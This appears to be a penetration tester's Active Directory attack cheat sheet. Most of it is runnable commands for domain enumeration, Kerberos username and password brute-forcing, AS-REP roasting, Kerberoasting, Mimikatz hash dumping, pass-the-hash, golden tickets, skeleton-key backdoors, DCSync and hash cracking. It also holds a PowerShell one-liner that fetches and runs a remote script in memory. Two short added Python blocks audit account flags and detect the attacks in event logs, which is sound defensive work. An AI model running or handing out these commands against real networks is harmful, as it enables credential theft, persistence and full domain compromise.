AD
AD Reconnaissance
List the local user accounts on the machine
net user
Show the current user
whoami
Show the current user's group memberships
whoami /groups
List all user accounts in the domain
net user /domain
Show a specific domain user's details, including group memberships
net user [username] /domain
PowerShell command to get all properties of a certain user
Get-ADUser -filter {name -like "sys.varonis.sql*"} -Properties *
Build an LDAP filter to find users with SPN values registered in the current domain (Kerberoastable accounts)
$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry   # no path given: binds to the current domain root
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000                                          # paged results so large domains are not truncated
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
$results = $search.FindAll()
# Collect the output under a different name: PowerShell variable names are case-insensitive,
# so assigning the loop output to $Results would overwrite the $results collection it walks
$spnUsers = foreach ($result in $results) {
    $entry = $result.GetDirectoryEntry()
    $entry | Select-Object @{ Name = "Username"; Expression = { $_.sAMAccountName }}, @{ Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object -First 1 }}
}
$spnUsers
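The two LDAP criteria used on this page (servicePrincipalName=* and the userAccountControl bit 4194304 used further down) are what an attacker selects on, so a defender can run the same selection against an export to find accounts to fix. The following audit helper is an added example, not code from the original page; the export records are constructed sample data and the flag table is a subset of the real userAccountControl bits.

```python
# Added audit example (not from the original page): decode the userAccountControl
# bitmask and flag the accounts the page's LDAP/Get-ADUser queries would return.
# SAMPLE_EXPORT is constructed sample data, not a real directory export.

DONT_REQ_PREAUTH = 0x400000      # 4194304, the value used in the Get-ADUser filters
UAC_FLAGS = {                    # subset of the real userAccountControl bits
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}

SAMPLE_EXPORT = [
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,
     "servicePrincipalName": ["MSSQLSvc/db01.corp.local:1433"]},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x400200,
     "servicePrincipalName": []},
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200,
     "servicePrincipalName": []},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202,
     "servicePrincipalName": ["HTTP/intranet.corp.local"]},
]

def decode_uac(value):
    """Return the names of the known UAC flags set in an integer userAccountControl."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def audit_roastable(records):
    """Classify accounts the way the page's LDAP queries would select them.

    Returns {sAMAccountName: [findings]}. Disabled accounts are still reported
    (they still match the queries) but are marked as lower risk."""
    findings = {}
    for rec in records:
        uac = rec["userAccountControl"]
        issues = []
        if rec["servicePrincipalName"]:
            issues.append("kerberoastable: SPN set on user account")
        if uac & DONT_REQ_PREAUTH:
            issues.append("as-rep roastable: DONT_REQ_PREAUTH set")
        if issues and uac & 0x0002:
            issues.append("account disabled (lower risk, still clean up)")
        if issues:
            findings[rec["sAMAccountName"]] = issues
    return findings
```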
Domain Discovery
# Identify the domain
net view /domain
# List of users in the domain
net user /domain
# List of groups on the domain
net group /domain
# Display list of file and printer shares on a specified computer
net view \\computerName
# Display shares including hidden shares on a remote computer
net view \\computername /all
# List of shares on a remote NetWare computer
net view /network:nw
# List all available servers on a specified domain
net view /domain:[domain name]
# Find the domain name of the current system
systeminfo | findstr /B /C:"Domain"
# Find logged in user's domain
echo %userdomain%
# Find domain name using WMIC
wmic computersystem get domain
Kerberos Reconnaissance - Pre-Auth
Brute-force valid usernames through the DC's pre-authentication responses
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/Active-Directory-Wordlists/User.txt
Brute-force passwords for a specific user
./kerbrute bruteuser --dc cpent.localnet -d cpent.localnet /usr/share/wordlists/Active-Directory-Wordlists/Pass.txt administrator
AS-REP Roasting
Identify users that have Kerberos preauthentication disabled and export their group memberships
# 4194304 = 0x400000 = DONT_REQ_PREAUTH bit in userAccountControl
Get-ADUser -Filter { UserAccountControl -band 4194304 } | ForEach-Object {
    $User = $_
    Get-ADPrincipalGroupMembership -Identity $User | Select-Object @{ Name = "User"; Expression = { $User.SAMAccountName }}, DistinguishedName, SAMAccountName
} | Export-Csv test.csv
Rubeus on Windows
Rubeus.exe asreproast
Harvest TGTs every 30 seconds
Rubeus.exe harvest /interval:30
Perform a password spray against all found users
Rubeus.exe brute /password:Password1 /noticket
Perform Kerberoasting
Rubeus.exe kerberoast
Crack AS-REP hashes with hashcat
hashcat -m 18200 hash.txt Pass.txt
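Every command in this section leaves a trace on the domain controller: AS-REP roasting produces 4768 events with no pre-authentication and an RC4 session key, Kerberoasting produces 4769 events with RC4 (etype 0x17) tickets for user accounts, and kerbrute's userenum produces bursts of 4768 failures with status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). The detection below is an added example, not code from the original page; the event records are constructed samples that follow the real 4768/4769 field names, and the enumeration threshold is an assumed tuning value.

```python
import re
from collections import defaultdict

# Added detection example, not code from the original page. It scans constructed
# Windows Security event records (4768 TGT requests, 4769 TGS requests) for the
# traffic the commands above generate. Field names follow the real event schema;
# the records themselves are made-up samples.

RC4_HMAC = "0x17"   # etype 23, the one behind $krb5asrep$23$ / $krb5tgs$23$ hashes

SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=legacy_app PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.45 Status=0x0",
    "EventID=4768 TargetUserName=jdoe PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.45 Status=0x0",
    "EventID=4769 TargetUserName=jdoe ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.0.0.45 Status=0x0",
    "EventID=4769 TargetUserName=jdoe ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.0.0.45 Status=0x0",
    "EventID=4768 TargetUserName=alice Status=0x6 IpAddress=10.0.0.99",
    "EventID=4768 TargetUserName=bob Status=0x6 IpAddress=10.0.0.99",
    "EventID=4768 TargetUserName=carol Status=0x6 IpAddress=10.0.0.99",
]

FIELD = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Turn one 'key=value key=value' record into a dict."""
    return dict(FIELD.findall(line))

def detect_kerberos_abuse(lines, enum_threshold=3):
    """Return (rule, detail) alerts in the order they are raised."""
    alerts = []
    unknown = defaultdict(set)   # source IP -> usernames the KDC did not know
    for ev in map(parse_event, lines):
        eid, etype = ev.get("EventID"), ev.get("TicketEncryptionType")
        if eid == "4768" and ev.get("Status") == "0x6":   # KDC_ERR_C_PRINCIPAL_UNKNOWN
            unknown[ev["IpAddress"]].add(ev["TargetUserName"])
        elif eid == "4768" and ev.get("PreAuthType") == "0" and etype == RC4_HMAC:
            # TGT issued with no pre-authentication and an RC4 key: AS-REP roast
            alerts.append(("as-rep-roast", f"{ev['TargetUserName']} from {ev['IpAddress']}"))
        elif eid == "4769" and etype == RC4_HMAC and not ev["ServiceName"].endswith("$"):
            # RC4 service ticket for a user (not machine$) account: Kerberoast candidate
            alerts.append(("kerberoast", f"{ev['TargetUserName']} got RC4 TGS for {ev['ServiceName']}"))
    for ip, names in unknown.items():
        if len(names) >= enum_threshold:
            alerts.append(("user-enum", f"{ip} probed {len(names)} unknown usernames"))
    return alerts
```

The same three rules are the usual starting point for a SIEM query; enforcing AES-only service accounts and re-enabling pre-authentication removes the first two findings at the source.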
Mimikatz Commands
Check for administrator privileges (expect the output Privilege '20' OK)
privilege::debug
Elevate privileges to system
token::elevate
Dump NTLM hashes
lsadump::sam
Pass the hash
sekurlsa::pth /user:administrator /domain:. /ntlm:b8699d84246004a8d6f
Metasploit Commands
Dump all hashes (meterpreter kiwi extension) and crack them with hashcat
lsa_dump_sam
Export all .kirbi tickets
sekurlsa::tickets /export
Perform pass the ticket attack
kerberos::ptt <ticket>
Verify impersonated ticket
klist
Dump the hash of the service account "krbtgt"
lsadump::lsa /inject /name:krbtgt
Get list of all users from ldap
use auxiliary/gather/ldap_query
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET
Get SPN from metasploit
use auxiliary/gather/ldap_query
set action ENUM_USER_SPNS_KERBEROAST
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET
Golden and Silver Tickets
Request a golden ticket
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500
Open a new elevated command prompt with the given ticket
misc::cmd
Maintain access with a skeleton key
misc::skeleton
DCSync
Extract hashes stored in NTDS.DIT
lsadump::dcsync /domain:cpent.local /all /csv
Kerberoasting from Linux
Authenticate to the domain with compromised credentials and list the SPN accounts
impacket-GetUserSPNs -dc-ip 172.25.170.80 ECC.LOCALNET/administrator
Request a TGS ticket and crack it with hashcat
impacket-GetUserSPNs -dc-ip 10.10.187.117 CONTROLLER.local/administrator -request
Crackmapexec Commands
Extract LSA hashes
crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --lsa
Extract NTDS database
crackmapexec smb -u username -p 'password' -d domain <dc-ip> --ntds
Extract SAM database
crackmapexec smb -u username -p 'password' -d domain <dc-ip or other domain-joined server> --sam
Perform Kerberoasting
crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --kerberoasting output.txt
Hashcat hash cracking
Crack NTLM hashes
hashcat -m 1000 -a 3 hash.txt
Crack Kerberos hashes
hashcat -m 13100 kerberoshash -a 0 -o results.txt /usr/share/wordlists/Active-Directory-Wordlists/Pass.txt
Crack AS-REP Roasting accounts
hashcat -m 18200 hash.txt Pass.txt
John the Ripper hash cracking
Crack NTLM hashes with John
john --format=nt hash.txt
PowerShell Commands
Identify users with Kerberos preauthentication disabled
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
Run Invoke-Kerberoast with PowerShell
powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"
This one-liner starts PowerShell with the execution policy set to Bypass so that unsigned scripts can run, downloads Invoke-Kerberoast.ps1,
executes it in memory without writing it to disk, and writes the resulting hashes to a file in hashcat format.
Query the NetBIOS name table of a remote host
nbtstat -a <IP>
Nmap SMB scripts against a host
nmap -p 139,445 --script "smb*" <target>
Mimikatz Commands
# Should print Privilege '20' OK, confirming SeDebugPrivilege (administrator) is available
privilege::debug
# Elevate privileges to system level
token::elevate
# Dump the NTLM hashes from Mimikatz in Windows
lsadump::sam
# Pass the NTLM hash to gain access as the administrator
sekurlsa::pth /user:administrator /domain:. /ntlm:b8699d84246004a8d6f
# Use PsExec to execute commands on a remote machine within the same internal network
PsExec.exe \\172.25.170.110 cmd.exe
# Dump all hashes from Metasploit and crack them with Hashcat if it's an NTLM hash
lsa_dump_sam
# Export all Kerberos tickets into the current directory
sekurlsa::tickets /export
# Perform a "pass the ticket" attack using the harvested ticket
kerberos::ptt <ticket.kirbi>
# Verify the successful impersonation of the ticket by listing cached tickets
klist
# Dump the hash of the krbtgt service account
lsadump::lsa /inject /name:krbtgt
# Dump the hash of a specific service account (SQLService)
lsadump::lsa /inject /name:SQLService
# Dump another account's hash (used for a silver ticket) by changing the account name
lsadump::lsa /inject /name:Administrator
# Generate a golden ticket for domain access
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500
# Open a new elevated command prompt with the given ticket
misc::cmd
# Backdoor access through Mimikatz by implanting a skeleton key into a domain controller
misc::skeleton
# Example commands to access shares with the skeleton key password ("mimikatz") instead of the account's real password
net use \\DOMAIN-CONTROLLER\admin$ mimikatz /user:Administrator
net use \\Desktop-1\c$ mimikatz /user:Machine1
dir \\Desktop-1\c$
Hash Extraction and Ticket Management
# Extract hashes stored in NTDS.DIT and output as CSV
lsadump::dcsync /domain:cpent.local /all /csv
# Load the Kiwi module for Kerberos
load kiwi
# Request a Kerberos ticket for SPN found by the LDAP query module
kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000
# List current session tickets
kerberos_ticket_list
# Export service tickets using Kiwi extension
kiwi_cmd kerberos::list /export
# Inject a new ticket into memory for authentication
kiwi_cmd kerberos::ptt Administrator.kirbi
# Convert the .kirbi ticket to a John or Hashcat compatible hash
python3 kirbi2john.py ~/1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi
# Crack the encrypted password using hashcat with the specified mode
hashcat -m 13100 --force -a 0 hash.txt wordlist.txt
Kerberoasting from Linux
# Kerberoasting from Linux with impacket
impacket-GetUserSPNs -dc-ip 172.25.170.80 ECC.LOCALNET/administrator # List SPN accounts with the given credentials
impacket-GetUserSPNs WS2012-DC/cpent:Pa$$w0rd123 -dc-ip 172.25.170.110 # Same enumeration as the cpent user (add -request to pull tickets)
impacket-GetUserSPNs -dc-ip 10.10.187.117 CONTROLLER.local/administrator -request # Request TGS tickets for the SPN accounts
# Crack the TGS hashes with hashcat (mode 13100 for $krb5tgs$23$ / RC4 hashes)
hashcat -m 13100 -a 0 hash.txt wordlist.txt
Kerberoasting from Windows
# Kerberoasting with impacket's GetUserSPNs.py and already cracked user credentials
GetUserSPNs.py htb.local/asmith:passw0rd # List SPN accounts as the cracked user
GetUserSPNs.py htb.local/asmith:password -request # Request TGS tickets for those accounts
CrackMapExec Commands
# CrackMapExec commands for various tasks
crackmapexec smb -u username -p 'password' -d domain <dc-ip> --lsa # Extract LSA secrets (template)
crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --lsa # Example command
PowerShell Command
# Start PowerShell with the execution policy set to Bypass for this process
powershell -ep bypass